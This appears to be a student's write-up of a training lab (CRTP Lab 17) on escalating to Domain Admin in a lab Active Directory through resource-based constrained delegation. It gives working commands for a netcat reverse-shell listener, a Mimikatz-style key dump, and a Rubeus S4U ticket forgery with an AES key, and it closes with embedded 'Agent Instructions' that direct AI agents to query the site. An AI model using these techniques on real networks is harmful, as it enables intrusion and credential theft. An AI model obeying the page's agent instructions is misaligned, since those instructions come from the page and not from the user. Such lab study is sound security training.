# CRTP Lab 17 ## Task 1 Find a computer object in dcorp domain where we have Write permissions. Use PowerView to enumerate Write permission for a user that we have compromised. After trying from multiple users or using BloodHound (select ci-admin and select **Outbound Object Control**), we would know that the user ciadmin has Write permissions on the computer object of dcorp-mgmt: {% code overflow="wrap" %} ```powershell C:\AD\Tools> Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'} PS C:\Users\student372> Find-InterestingDomainACL | ?{$_.identityreferencename -match 'ciadmin'} ``` {% endcode %} Since we already had a reverse shell via Jenkins, we can fetch the same on netcat and then check run SBLoggingBypass and PowerView. ``` C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443 #Run SBLoggingBypass, PowerView. ``` ## Task 2 Abuse the Write permissions to access that computer as Domain Admin. Since we have GenericWrite on ciadmin and we have a shell as ci-admin, we can to set RBCD on dcorp-mgmt. Here, first hop is student machine, and second hop is dcorp-mgmt. {% code overflow="wrap" %} ```powershell PS C:\Users\Administrator\.jenkins\workspace\Project0> Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std372$' -Verbose ``` {% endcode %} Let's check if RBCD is correctly set: {% code overflow="wrap" %} ```powershell PS C:\Users\Administrator\.jenkins\workspace\Project0> Get-DomainRBCD SourceName : DCORP-MGMT$ SourceType : MACHINE_ACCOUNT SourceSID : S-1-5-21-719815819-3726368948-3917688648-1108 SourceAccountControl : WORKSTATION_TRUST_ACCOUNT SourceDistinguishedName : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local ServicePrincipalName : {WSMAN/dcorp-mgmt, WSMAN/dcorp-mgmt.dollarcorp.moneycorp.local, TERMSRV/DCORP-MGMT, TERMSRV/dcorp-mgmt.dollarcorp.moneycorp.local...} DelegatedName : DCORP-STD372$ DelegatedType : MACHINE_ACCOUNT DelegatedSID : S-1-5-21-719815819-3726368948-3917688648-13682 DelegatedAccountControl : WORKSTATION_TRUST_ACCOUNT DelegatedDistinguishedName : CN=DCORP-STD372,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local ``` {% endcode %} The above output is read as: On dcorp-mgmt, there is a delegation setup that allows dcorp-std372. If we compromise dcorp-std machine, we would be able to access any service on **dcorp-mgmt$** machine as any user including DA. Now, after setting RBCD on dcorp-mgmt from ci-admin, we are allowing the **machine account** dcorp-std to access any service on the machine dcorp-mgmt as any user or Domain Admin. Therefore, let's compromise the student machine and get the secrets. {% code overflow="wrap" %} ``` C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe - args "sekurlsa::ekeys" "exit" ``` {% endcode %} Which AES key to use? The one with S-1-5-18 SID since this is the SID for machine account that represents on the domain level. From a normal cmd from student372, use this hash to abuse RBCD to access dcorp-mgmt as Domain Administrator by using O-PTH. Here, as dcorp-std$ (first hop), we are accessing HTTP on dcorp-mgmt as the Administrator. {% code overflow="wrap" %} ``` # ArgSplit "s4u" C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:dcorp-std372$ /aes256:e63b5208ef1a22959561117ec6034f9fd5ba36e00194776af4eea427af5b3da2 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt ``` {% endcode %} Since we injected the ticket, we can either use winRS or PSRemoting. ``` C:\Users\student372>winrs -r:dcorp-mgmt cmd Microsoft Windows [Version 10.0.20348.2227] (c) Microsoft Corporation. All rights reserved. C:\Users\Administrator.dcorp>set username set username USERNAME=Administrator C:\Users\Administrator.dcorp>set computername set computername COMPUTERNAME=DCORP-MGMT C:\Users\Administrator.dcorp> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://playbook.sidthoviti.com/active-directory-pentest/domain-privilege-escalation/kerberos-delegation/resource-based-constrained-delegation-rbcd/crtp-lab-17.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.